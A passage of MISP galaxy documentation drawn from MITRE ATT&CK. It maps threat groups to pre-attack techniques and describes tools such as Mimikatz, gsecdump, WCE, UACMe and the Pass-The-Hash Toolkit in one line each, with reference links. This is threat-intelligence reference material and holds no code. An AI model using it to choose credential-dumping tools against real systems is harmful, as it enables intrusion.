<h3 id="_apt1_g0006_uses_post_compromise_tool_development_pre_t1130"><a class="anchor" href="#_apt1_g0006_uses_post_compromise_tool_development_pre_t1130"></a><a class="link" href="#_apt1_g0006_uses_post_compromise_tool_development_pre_t1130">APT1 (G0006) uses Post compromise tool development (PRE-T1130)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_apt16_g0023_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_apt16_g0023_uses_determine_strategic_target_pre_t1018">APT16 (G0023) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_night_dragon_g0014_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_night_dragon_g0014_uses_determine_strategic_target_pre_t1018">Night Dragon (G0014) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_create_strategic_plan_pre_t1008"><a class="anchor" href="#_apt1_g0006_uses_create_strategic_plan_pre_t1008"></a><a class="link" href="#_apt1_g0006_uses_create_strategic_plan_pre_t1008">APT1 (G0006) uses Create strategic plan (PRE-T1008)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_compromise_of_externally_facing_system_pre_t1165"><a class="anchor" href="#_night_dragon_g0014_uses_compromise_of_externally_facing_system_pre_t1165"></a><a class="link" href="#_night_dragon_g0014_uses_compromise_of_externally_facing_system_pre_t1165">Night Dragon (G0014) uses Compromise of externally facing system (PRE-T1165)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_spear_phishing_messages_with_malicious_links_pre_t1146"><a class="anchor" href="#_apt1_g0006_uses_spear_phishing_messages_with_malicious_links_pre_t1146"></a><a class="link" href="#_apt1_g0006_uses_spear_phishing_messages_with_malicious_links_pre_t1146">APT1 (G0006) uses Spear phishing messages with malicious links (PRE-T1146)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_obfuscate_or_encrypt_code_pre_t1096"><a class="anchor" href="#_apt1_g0006_uses_obfuscate_or_encrypt_code_pre_t1096"></a><a class="link" href="#_apt1_g0006_uses_obfuscate_or_encrypt_code_pre_t1096">APT1 (G0006) uses Obfuscate or encrypt code (PRE-T1096)</a></h3>
</div>
<div class="sect2">
<h3 id="_friend_follow_connect_to_targets_of_interest_pre_t1121_related_to_friend_follow_connect_to_targets_of_interest_pre_t1141"><a class="anchor" href="#_friend_follow_connect_to_targets_of_interest_pre_t1121_related_to_friend_follow_connect_to_targets_of_interest_pre_t1141"></a><a class="link" href="#_friend_follow_connect_to_targets_of_interest_pre_t1121_related_to_friend_follow_connect_to_targets_of_interest_pre_t1141">Friend/Follow/Connect to targets of interest (PRE-T1121) related-to Friend/Follow/Connect to targets of interest (PRE-T1141)</a></h3>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085"><a class="anchor" href="#_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085"></a><a class="link" href="#_night_dragon_g0014_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085">Night Dragon (G0014) uses Acquire and/or use 3rd party software services (PRE-T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_apt1_g0006_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_apt1_g0006_uses_determine_strategic_target_pre_t1018">APT1 (G0006) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_domain_registration_hijacking_pre_t1103"><a class="anchor" href="#_apt1_g0006_uses_domain_registration_hijacking_pre_t1103"></a><a class="link" href="#_apt1_g0006_uses_domain_registration_hijacking_pre_t1103">APT1 (G0006) uses Domain registration hijacking (PRE-T1103)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_identify_business_relationships_pre_t1049"><a class="anchor" href="#_apt16_g0023_uses_identify_business_relationships_pre_t1049"></a><a class="link" href="#_apt16_g0023_uses_identify_business_relationships_pre_t1049">APT16 (G0023) uses Identify business relationships (PRE-T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074">Analyze organizational skillsets and deficiencies (PRE-T1066) related-to Analyze organizational skillsets and deficiencies (PRE-T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_software_services_pre_t1107_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1085"><a class="anchor" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1107_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1085"></a><a class="link" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1107_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1085">Acquire and/or use 3rd party software services (PRE-T1107) related-to Acquire and/or use 3rd party software services (PRE-T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1053"><a class="anchor" href="#_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1053"></a><a class="link" href="#_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1053">Identify supply chains (PRE-T1042) related-to Identify supply chains (PRE-T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_software_services_pre_t1085_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1107"><a class="anchor" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1085_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1107"></a><a class="link" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1085_related_to_acquire_and_or_use_3rd_party_software_services_pre_t1107">Acquire and/or use 3rd party software services (PRE-T1085) related-to Acquire and/or use 3rd party software services (PRE-T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_discover_target_logon_email_address_format_pre_t1032"><a class="anchor" href="#_apt16_g0023_uses_discover_target_logon_email_address_format_pre_t1032"></a><a class="link" href="#_apt16_g0023_uses_discover_target_logon_email_address_format_pre_t1032">APT16 (G0023) uses Discover target logon/email address format (PRE-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_post_compromise_tool_development_pre_t1130"><a class="anchor" href="#_apt12_g0005_uses_post_compromise_tool_development_pre_t1130"></a><a class="link" href="#_apt12_g0005_uses_post_compromise_tool_development_pre_t1130">APT12 (G0005) uses Post compromise tool development (PRE-T1130)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1045"><a class="anchor" href="#_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1045"></a><a class="link" href="#_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1045">Conduct social engineering (PRE-T1056) related-to Conduct social engineering (PRE-T1045)</a></h3>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_tool"><a class="anchor" href="#_tool"></a><a class="link" href="#_tool">Tool</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Tool is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/tool.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_at"><a class="anchor" href="#_at"></a><a class="link" href="#_at">at</a></h3>
<div class="paragraph">
<p>at is used to schedule tasks on a system to run at a specified date or time.[[Citation: TechNet At]]</p>
</div>
<div class="paragraph">
<p>Aliases: at, at.exe</p>
</div>
<div class="paragraph">
<p>at is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>at</p>
</li>
<li>
<p>at.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1635. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0110">https://attack.mitre.org/wiki/Software/S0110</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490866.aspx">https://technet.microsoft.com/en-us/library/bb490866.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_route"><a class="anchor" href="#_route"></a><a class="link" href="#_route">route</a></h3>
<div class="paragraph">
<p>route can be used to find or change information within the local system IP routing table.[[Citation: TechNet Route]]</p>
</div>
<div class="paragraph">
<p>Aliases: route, route.exe</p>
</div>
<div class="paragraph">
<p>route is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>route</p>
</li>
<li>
<p>route.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1636. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0103">https://attack.mitre.org/wiki/Software/S0103</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490991.aspx">https://technet.microsoft.com/en-us/library/bb490991.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tasklist"><a class="anchor" href="#_tasklist"></a><a class="link" href="#_tasklist">Tasklist</a></h3>
<div class="paragraph">
<p>The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface.[[Citation: Microsoft Tasklist]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1637. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0057">https://attack.mitre.org/wiki/Software/S0057</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb491010.aspx">https://technet.microsoft.com/en-us/library/bb491010.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_credential_editor"><a class="anchor" href="#_windows_credential_editor"></a><a class="link" href="#_windows_credential_editor">Windows Credential Editor</a></h3>
<div class="paragraph">
<p>Windows Credential Editor is a password dumping tool.[[Citation: Amplia WCE]]</p>
</div>
<div class="paragraph">
<p>Aliases: Windows Credential Editor, WCE</p>
</div>
<div class="paragraph">
<p>Windows Credential Editor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Windows Credential Editor</p>
</li>
<li>
<p>WCE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1638. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0005">https://attack.mitre.org/wiki/Software/S0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.ampliasecurity.com/research/wcefaq.html">http://www.ampliasecurity.com/research/wcefaq.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_schtasks"><a class="anchor" href="#_schtasks"></a><a class="link" href="#_schtasks">schtasks</a></h3>
<div class="paragraph">
<p>schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time.[[Citation: TechNet Schtasks]]</p>
</div>
<div class="paragraph">
<p>Aliases: schtasks, schtasks.exe</p>
</div>
<div class="paragraph">
<p>schtasks is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>schtasks</p>
</li>
<li>
<p>schtasks.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1639. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0111">https://attack.mitre.org/wiki/Software/S0111</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490996.aspx">https://technet.microsoft.com/en-us/library/bb490996.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uacme"><a class="anchor" href="#_uacme"></a><a class="link" href="#_uacme">UACMe</a></h3>
<div class="paragraph">
<p>UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.[[Citation: Github UACMe]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1640. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0116">https://attack.mitre.org/wiki/Software/S0116</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ifconfig"><a class="anchor" href="#_ifconfig"></a><a class="link" href="#_ifconfig">ifconfig</a></h3>
<div class="paragraph">
<p>ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system.[[Citation: Wikipedia Ifconfig]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1641. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0101">https://attack.mitre.org/wiki/Software/S0101</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Ifconfig">https://en.wikipedia.org/wiki/Ifconfig</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mimikatz"><a class="anchor" href="#_mimikatz"></a><a class="link" href="#_mimikatz">Mimikatz</a></h3>
<div class="paragraph">
<p>Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.[[Citation: Deply Mimikatz]][[Citation: Adsecurity Mimikatz Guide]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1642. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0002">https://attack.mitre.org/wiki/Software/S0002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?page%20id=1821">https://adsecurity.org/?page%20id=1821</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xcmd"><a class="anchor" href="#_xcmd"></a><a class="link" href="#_xcmd">xCmd</a></h3>
<div class="paragraph">
<p>xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems.[[Citation: xCmd]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1643. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0123">https://attack.mitre.org/wiki/Software/S0123</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/">https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_systeminfo"><a class="anchor" href="#_systeminfo"></a><a class="link" href="#_systeminfo">Systeminfo</a></h3>
<div class="paragraph">
<p>Systeminfo is a Windows utility that can be used to gather detailed information about a computer.[[Citation: TechNet Systeminfo]]</p>
</div>
<div class="paragraph">
<p>Aliases: systeminfo.exe, Systeminfo</p>
</div>
<div class="paragraph">
<p>Systeminfo is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>systeminfo.exe</p>
</li>
<li>
<p>Systeminfo</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1644. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0096">https://attack.mitre.org/wiki/Software/S0096</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb491007.aspx">https://technet.microsoft.com/en-us/library/bb491007.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netsh"><a class="anchor" href="#_netsh"></a><a class="link" href="#_netsh">netsh</a></h3>
<div class="paragraph">
<p>netsh is a scripting utility used to interact with networking components on local or remote systems.[[Citation: TechNet Netsh]]</p>
</div>
<div class="paragraph">
<p>Aliases: netsh, netsh.exe</p>
</div>
<div class="paragraph">
<p>netsh is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>netsh</p>
</li>
<li>
<p>netsh.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1645. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0108">https://attack.mitre.org/wiki/Software/S0108</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/bb490939.aspx">https://technet.microsoft.com/library/bb490939.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dsquery"><a class="anchor" href="#_dsquery"></a><a class="link" href="#_dsquery">dsquery</a></h3>
<div class="paragraph">
<p>dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain.[[Citation: TechNet Dsquery]] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</p>
</div>
<div class="paragraph">
<p>Aliases: dsquery, dsquery.exe</p>
</div>
<div class="paragraph">
<p>dsquery is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>dsquery</p>
</li>
<li>
<p>dsquery.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1646. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0105">https://attack.mitre.org/wiki/Software/S0105</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732952.aspx">https://technet.microsoft.com/en-us/library/cc732952.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gsecdump"><a class="anchor" href="#_gsecdump"></a><a class="link" href="#_gsecdump">gsecdump</a></h3>
<div class="paragraph">
<p>gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems.[[Citation: TrueSec Gsecdump]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1647. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0008">https://attack.mitre.org/wiki/Software/S0008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.truesec.com/Tools/Tool/gsecdump%20v2.0b5">http://www.truesec.com/Tools/Tool/gsecdump%20v2.0b5</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ping"><a class="anchor" href="#_ping"></a><a class="link" href="#_ping">Ping</a></h3>
<div class="paragraph">
<p>Ping is an operating system utility commonly used to troubleshoot and verify network connections.[[Citation: TechNet Ping]]</p>
</div>
<div class="paragraph">
<p>Aliases: ping.exe, Ping</p>
</div>
<div class="paragraph">
<p>Ping is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ping.exe</p>
</li>
<li>
<p>Ping</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1648. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0097">https://attack.mitre.org/wiki/Software/S0097</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490968.aspx">https://technet.microsoft.com/en-us/library/bb490968.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fgdump"><a class="anchor" href="#_fgdump"></a><a class="link" href="#_fgdump">Fgdump</a></h3>
<div class="paragraph">
<p>Fgdump is a Windows password hash dumper.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1649. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0120">https://attack.mitre.org/wiki/Software/S0120</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lslsass"><a class="anchor" href="#_lslsass"></a><a class="link" href="#_lslsass">Lslsass</a></h3>
<div class="paragraph">
<p>Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1650. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0121">https://attack.mitre.org/wiki/Software/S0121</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_toolkit"><a class="anchor" href="#_pass_the_hash_toolkit"></a><a class="link" href="#_pass_the_hash_toolkit">Pass-The-Hash Toolkit</a></h3>
<div class="paragraph">
<p>Pass-The-Hash Toolkit is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1651. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0122">https://attack.mitre.org/wiki/Software/S0122</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ftp"><a class="anchor" href="#_ftp"></a><a class="link" href="#_ftp">FTP</a></h3>
<div class="paragraph">
<p>FTP is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[[Citation: Wikipedia FTP]]</p>
</div>
<div class="paragraph">
<p>Aliases: FTP, ftp.exe</p>
</div>
<div class="paragraph">
<p>FTP is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FTP</p>
</li>
<li>
<p>ftp.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1652. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0095">https://attack.mitre.org/wiki/Software/S0095</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/File%20Transfer%20Protocol">https://en.wikipedia.org/wiki/File%20Transfer%20Protocol</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ipconfig"><a class="anchor" href="#_ipconfig"></a><a class="link" href="#_ipconfig">ipconfig</a></h3>
<div class="paragraph">
<p>ipconfig is a Windows utility that can be used to find information about a system&#8217;s TCP/IP, DNS, DHCP, and adapter configuration.[[Citation: TechNet Ipconfig]]</p>
</div>
<div class="paragraph">
<p>Aliases: ipconfig, ipconfig.exe</p>
</div>
<div class="paragraph">
<p>ipconfig is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ipconfig</p>
</li>
<li>
<p>ipconfig.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1653. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0100">https://attack.mitre.org/wiki/Software/S0100</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490921.aspx">https://technet.microsoft.com/en-us/library/bb490921.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_certutil"><a class="anchor" href="#_certutil"></a><a class="link" href="#_certutil">certutil</a></h3>
<div class="paragraph">
<p>Certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services.[[Citation: TechNet Certutil]]</p>
</div>
<div class="paragraph">
<p>Aliases: certutil, certutil.exe</p>
</div>
<div class="paragraph">
<p>certutil is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>certutil</p>
</li>
<li>
<p>certutil.exe</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1654. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0160">https://attack.mitre.org/wiki/Software/S0160</a></p></td>
</tr>
<tr>
